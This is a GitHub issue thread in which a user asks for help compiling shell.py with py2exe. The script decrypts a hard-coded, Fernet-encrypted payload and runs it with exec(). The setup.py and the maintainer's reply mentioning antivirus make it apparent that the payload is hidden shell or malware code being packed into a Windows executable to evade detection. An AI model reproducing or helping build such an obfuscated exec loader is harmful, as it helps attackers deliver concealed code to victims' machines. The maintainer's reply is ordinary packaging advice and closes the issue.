### ISSUE TITLE
Cant compile and errors

### ISSUE THREAD

**Issue by usama7628674** [albertosottile/py2exe#21]
Heres the file `shell.py`
```
from cryptography.fernet import Fernet
import os
import sys
key = b'AZ4--Fzn_y61GxIcXUYFQ_992jA_TAnP5X60Ag-ZGkU='
f_obj = Fernet(key)
enc_pay = b'gAAAAABdiaiwa85zytusRla7Q3cIjDPOCuGM6A18W3ZSxNgWDRScCm3zNbTWfiNXRxjBOw5wfiZkk545-XKO7YF2zP3PzOrstCFt0hErnvR_EwF9BvVRA0Y5ATUwA4JsdYmD-_YkdNpinWD8Xu5g_oyZRPxs4JYJj70sA_fsXflp6enS2KljPzLmHtXJIIUs_QFvcWxRvlz7XSFtBQVTbdX6xSTpfUEQiaP3p3tDtsMUt45ku3wzuEybxQrMIvrzIYzAGHwgbbi9x3pqLtWzyxa0V_0TYRes92l8SGLkvqfXpNT8hm2W53voOCVrN44LeJ1qFuzCrm8w_O9ZLzWKspaleYKYKprava-KENkJOLOa9emlKnXalDQKO85-89eIdiuaymwKqp7Ds2mLNbCGPpb8Y_z5af-CgfnltAOScXj4BgVlta641t96meUGRGs3ROvEhsVl_HdhDN-JlgNTc7dZ94R8kCM49jP_bJX14XNM60S8tEItUZmBdI8ggsrzuQ_Eo9vC8FMAoZpdhIq4QQnvcQSaKmdpMvIl0B-No9IJsc2iA7gSF3jUlYPDn58ves1INPAjcii-p2zJFY0LySWeOqR5adnUz_0ltnHl7pU220zIYWmrSLpdOSQox3s4Po48rdAqp6vxPQ0hBnAQgLzGHE25ryvDHGud4wGCPs-uqCWm9_6MrSZ4s8Q6GYMY8HfVV0KoGCPsZuGS4Q4Pevjny9kpbMxxVrcthcobyWwzTShJxKlzoN6OOe9dfZeguJZqKLhFfWuhAmxkYZdZsLhbf6UUjPa3aENH164DuFhHrIqf6_UENPwFwv_4Xf09TF8YtYtflcp-Lyiw_XVm3zCf53NIzaJ_afePc0LwSaEgyliNSmfsokAbqYC1bXyAVRvnXO8wUxY7xsSXlzPYYrhKu2yuYGPZhhR8O7XZTVnm4lsIcBhJa7_sbVo4FEsvfCQLb0TYDIMgG-F88aXNw7IpnRKcy9lwJ-pFd9aC7CKDy9hufhAWvRGtMmUzBG9EEjupH8o2c-g3AxYkD0UOD9eec_hIsNcWoeUxZerjLPEWHxZbFx2w30ztKmoPJG-lwXFfHqSyFW5ZLWOk1TT_3-F6qtajdkJCORqezkkvcasYM3trqrS71amNxVLCV85ltQ3DpOWK2VzLE9KXBln2RX24cnI1tqYFzo1FjC6IpQFqz3l6c72aoURC9dEspm8CvGjSU2_fFCoO7Ps97tDO9lk0OCFxG11LtD_--MDBBhekj8VGqRfv-fjE-X-wVmFUkjSfsaZpj9YGocpv2cCn505bAWa4djJe78L_nFjZCYIPEkn51LXkZ9qHjlrObbyvNEQmyK8A-xHkyu8UMqE42GXnX-GP-4ZIJ65MhlT3HV5fAbF2b7VexmRSnLxQ1LB0plD3WtsvAOPcJskdSHVSGiqyC_NHXWRcirZ6VUzREFdcTuz1gYceCqUGjaMXbRNIAYSP_rAjlxUVfC9LmvruMZOWdxjWWbAf8i5q5qIA1sz87DV28hD-IA4udLgbYhVYl0vZztP7RQ4I'
exec(f_obj.decrypt(enc_pay))

```

Heres the `setup.py` file
```
from distutils.core import setup
import py2exe

setup( console=[{ "script": 'shell.py'},],
       options={"py2exe": {
            "bundle_files": 3,
            "packages": ['cryptography'],
            "includes": ['cryptography.fernet','imp','cffi','asn1crypto'],
            "excludes": ['pkg_resources','doctest', 'pdb', 'calendar', 'optparse', 'jsonschema', 'tornado', 'setuptools', 'matplotlib','time','calendar','idna','six.moves.urllib','calendar','ssl','time']}})
```

`CMD` log
![Capture](https://user-images.githubusercontent.com/29252277/65490885-62441d00-dec7-11e9-89dc-1463c4a175ae.PNG)

![Capture2](https://user-images.githubusercontent.com/29252277/65490894-67a16780-dec7-11e9-8f31-7092bbae8611.PNG)

Python version : `3.7.4 (32-bit)`
py2exe version : `0.9.3.1-cp37-none-win32`

Tried different methods like bundle files,includes,excludes,packages but nothing works.

**Comment by albertosottile** [comment]
Hi, thanks for reporting this. May I ask you why you explicitly excluded `calendar` three times in your `setup.py` file? In general, it is never a good idea to exclude modules from the standard library, unless extremely necessary. This does not seem the case. Furthermore, you also excluded `ssl`, but `cryptography` needs that. 

In addition, the content of your decrypted `exec` call depends on a lot more modules, so you should probably add some of those in the `setup.py` file manually, since the parser of `py2exe` has no way to know that you need them. Finally, I do not think that any antivirus nor firewall will let you run the packed executable of this code without fighting.

AFAIK, there is no guarantee that a similar approach would work in general, and it is definitely not supported. I would advise you to play with the includes and excludes in `setup.py`, but I am closing this for now.
